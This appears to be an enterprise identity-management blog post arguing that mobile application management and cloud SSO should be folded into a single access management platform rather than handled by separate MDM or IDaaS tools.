So, here's a question: is MDM the right approach to controlling access for mobile users? Do you really want to stand up a new technology silo that manages end-user devices? Is that even practical? I think certain technologies live a short life because they quickly get passed over by something new and better (think electric typewriters). MDM is one of those. Although it's still fairly new and good at what it does, I would make the claim that MDM is antiquated technology. In a BYOD world, people don't want to turn control of their devices over to their employers. The age of enterprises controlling devices went out the window with BlackBerry's market share.

Containerization is where it's at. With App Containerization, organizations create a secure virtual workspace on mobile devices that enables corporate-approved apps to access, use, edit, and share corporate data while protecting that data from escape to unapproved apps, personal email, OS malware, and other on-device leakage points. For enterprise use-case scenarios, this just makes more sense than MDM. And many of the top MDM vendors have validated the approach by announcing MAM offerings. Still, these solutions maintain a technology silo specific to remote access which doesn't make much sense to me.

As an alternate approach, let's build MAM capabilities directly into the existing Access Management platform. Access Management for the third platform must accommodate for mobile device use-cases. There's no reason to have to manage mobile device access differently than desktop access. It's the same applications, the same data, and the same business policies. User provisioning workflows should accommodate for provisioning mobile apps and data rights just like they've been extended to provision Privileged Account rights. You don't want or need separate silos.

Cloud

The same can be said, for cloud-hosted apps. Cloud apps are simply part of the extended enterprise and should also be managed via the enterprise Access Management platform.

There's been a lot of buzz in the IAM industry about managing access (and providing SSO) to cloud services. A number of niche vendors have even popped up that provide that as their primary value proposition. But the core technologies for these stand-alone solutions are nothing new. In most cases, it's basic federation. In some cases, it's ESSO-style form-fill. But there's no magic to delivering SSO to SaaS apps. In fact, it's typically easier than SSO to enterprise apps because SaaS infrastructures are newer and support newer standards and protocols (SAML, REST, etc.).

My Point

I guess if I had to boil this down, I'm really just trying to dispel the myths about mobile and cloud solutions. When you get past the marketing jargon, we're still talking about Access Management and Identity Governance. Some of the new technologies are pretty cool (containerization solves some interesting, complex problems related to BYOD). But in the end, I'd want to manage enterprise access in one place with one platform. One Identity, One Platform. I wouldn't stand up an IDaaS solution just to have SSO to cloud apps. And I wouldn't want to introduce an MDM vendor to control access from mobile devices.

The third platform simply extends the enterprise beyond the firewall. The concept isn't new and the technologies are mostly the same. As more and newer services adopt common protocols, it gets even easier to support increasingly complex use-cases. An API Gateway, for example, allows a mobile app to access legacy mainframe data over REST protocols. And modern Web Access Management (WAM) solutions perform device fingerprinting to increase assurance and reduce risk while delivering an SSO experience. Mobile Security SDKs enable organizations to build their own apps with native security that's integrated with the enterprise WAM solution (this is especially valuable for consumer-facing apps).

And all of this should be delivered on a single platform for Enterprise Access Management. That's third-platform IAM.

Is MAM Identity and Access Management’s next big thing?

Mobile Application Management is making waves. Recent news from Oracle, IBM, and Salesforce highlight the market interest. It's a natural extension of what you've been hearing at Identity trade shows over the past few years (and this year's Gartner IAM Summit was no exception). The third platform of computing is not a future state. It's here. And Identity and Access solutions are adapting to accommodate the new use case scenarios. ...onward and upward.

[Update - interesting discussion of the IAM technology stack for mobile by SIMIEO]